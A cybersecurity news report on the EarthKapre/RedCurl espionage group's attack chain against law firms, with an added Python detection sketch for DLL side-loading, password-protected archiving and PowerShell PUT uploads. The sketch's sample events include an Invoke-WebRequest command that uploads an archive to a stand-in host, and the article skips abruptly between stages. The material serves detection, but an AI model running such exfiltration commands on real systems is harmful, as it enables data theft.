A highly sophisticated cyber espionage group known as EarthKapre, also referred to as RedCurl, has been identified targeting private-sector organizations, particularly those in the Law Firms & Legal Services industry. The eSentire Threat Response Unit (TRU) uncovered the group's recent activities in January 2025, revealing a complex attack chain designed for corporate espionage.

Opening the file triggers a technique called "DLL side-loading," in which the EarthKapre loader ("netutils.dll") is executed. Upon successful execution of the final stage, EarthKapre runs a series of commands to gather system information, including user account details, system configurations, disk information, and installed antivirus products. The collected data is then archived using 7-Zip with password protection and exfiltrated to the cloud storage provider "Tab Digital" via PowerShell PUT requests.

Security researchers at eSentire discovered that they could exploit the limitations of Cloudflare Workers' free tier (100,000 requests per day) to disrupt the threat actor's operations.

eSentire recommends that organizations educate their employees on the dangers of phishing emails, especially those disguised as job applications. Additionally, organizations should implement robust endpoint detection and response (EDR) solutions to detect and prevent sophisticated attacks like those employed by EarthKapre.
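The three observable stages above (side-loaded "netutils.dll" outside the Windows system directories, 7-Zip invoked with a password switch, PowerShell issuing an HTTP PUT) can be checked against process and image-load telemetry. The following is an added detection sketch, not eSentire's rule set or the report's own code; the event field names and the sample events are constructed for illustration.

```python
import re

# Legitimate load locations for Windows system DLLs; netutils.dll elsewhere is suspect.
SYSTEM_DLL_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")

def is_sideload_candidate(event):
    """netutils.dll loaded from anywhere other than the system directories."""
    dll = event.get("dll", "").lower()
    return dll.endswith("\\netutils.dll") and not dll.startswith(SYSTEM_DLL_DIRS)

def is_password_archive(event):
    """7-Zip started with a -p password switch (password-protected archive)."""
    img = event.get("image", "").lower()
    cmd = event.get("cmdline", "")
    return img.endswith(("7z.exe", "7za.exe")) and re.search(r"(^|\s)-p\S*", cmd) is not None

def is_powershell_put(event):
    """PowerShell web cmdlet invoked with -Method Put (upload to external storage)."""
    img = event.get("image", "").lower()
    cmd = event.get("cmdline", "").lower()
    return img.endswith("powershell.exe") and re.search(r"-method\s+put\b", cmd) is not None

RULES = {
    "dll_sideload": is_sideload_candidate,
    "password_archive": is_password_archive,
    "powershell_put": is_powershell_put,
}

def evaluate(events):
    """Names of the rules that fired, in order of first hit across the event stream."""
    hits = []
    for ev in events:
        for name, rule in RULES.items():
            if name not in hits and rule(ev):
                hits.append(name)
    return hits

def full_chain(events):
    """True when every stage of the described chain was seen on this host."""
    return len(evaluate(events)) == len(RULES)

# Constructed sample events (hypothetical paths and hostnames, not indicators from the report).
SAMPLE_EVENTS = [
    {"image": r"C:\Users\jdoe\Downloads\Application\Setup.exe", "cmdline": "Setup.exe",
     "dll": r"C:\Users\jdoe\Downloads\Application\netutils.dll"},
    {"image": r"C:\Windows\System32\svchost.exe", "cmdline": "svchost.exe -k netsvcs",
     "dll": r"C:\Windows\System32\netutils.dll"},
    {"image": r"C:\Users\jdoe\AppData\Local\Temp\7z.exe",
     "cmdline": r"7z.exe a -pS3cret C:\Users\jdoe\AppData\Local\Temp\out.7z C:\Users\jdoe\AppData\Local\Temp\col"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -Command Invoke-WebRequest -Uri https://storage.example/upload -Method Put -InFile out.7z"},
]
```

The second sample event (netutils.dll loaded by svchost.exe from System32) is the benign control and should not fire; only the three-stage sequence on one host is worth escalating.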
This Cyber News was published on cybersecuritynews.com. Publication date: Fri, 14 Feb 2025 16:40:14 +0000